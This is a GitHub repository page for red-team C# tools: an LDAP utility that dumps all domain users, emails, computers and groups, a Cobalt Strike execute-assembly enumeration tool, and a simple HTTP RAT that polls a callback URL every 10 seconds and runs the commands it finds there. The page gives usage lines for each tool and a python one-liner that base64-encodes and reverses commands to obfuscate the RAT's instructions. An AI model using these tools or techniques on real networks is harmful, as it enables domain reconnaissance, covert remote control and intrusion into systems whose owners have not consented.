Skip to content
C# Script used for Red Team
Branch: master
Clone or download
Latest commit 1eaa4e1 Aug 2, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information. Update Aug 1, 2019
enumerateuser.cs Create enumerateuser.cs Jul 11, 2019
enumerateuser.exe Add files via upload Jul 11, 2019
ldapquery.cs Create ldapquery.cs Jul 11, 2019
ldapquery.exe Add files via upload Jul 11, 2019
ldaputility.cs Create ldaputility.cs Aug 1, 2019
ldaputility.exe Add files via upload Aug 1, 2019
simple-http-rat.cs Update simple-http-rat.cs Jul 31, 2019


C# Script used for Red Team. These binaries can be used by Cobalt Strike execute-assembly or as standalone executable.

LDAP utility

LDAP utility contains several LDAP query that will return all the valuable information you are looking for.

The utility support the following options

DumpAllUsers        Dump all the users 
DumpUser            Dump user information based on the samaccountname provided
DumpUsersEmail      Dump all users and email addresses
DumpAllComputers    Dump all computers
DumpComputer        Dump a computer information based on the name provided
DumpAllGroups       Dump all groups
DumpGroup           Dump a group information based on the name provided
Usage: ldaputility.exe options domain [arguments]

ldaputility.exe DumpAllUsers RingZer0
ldaputility.exe DumpUser RingZer0 mr.un1k0d3r
ldaputility.exe DumpUsersEmail RingZer0
ldaputility.exe DumpAllComputers RingZer0 
ldaputility.exe DumpComputer RingZer0 DC01
ldaputility.exe DumpAllGroups RingZer0
ldaputility.exe DumpGroup RingZer0 "Domain Admins"


List all the users samaccountname & mail

execute-assembly C:\enumerateuser.exe domain


Perform custom ldap queries

execute-assembly C:\enumerateuser.exe ringzer0team "(&(objectCategory=User)(samaccountname=Mr.Un1k0d3r))" samaccountname,mail

Querying LDAP://ringzer0team
Querying: (&(objectCategory=User)(samaccountname=Mr.Un1k0d3r))
Extracting: samaccountname,mail


A simple RAT that execute command over HTTP. The code is calling back every 10 seconds and will execute the data present on the callback URL.

rat.exe callbackurl

The data is obfuscated using the following python trick

$ python -c 'import base64; print base64.b64encode("cmd.exe /c whoami")[::-1]'


Mr.Un1k0d3r RingZer0 Team

You can’t perform that action at this time.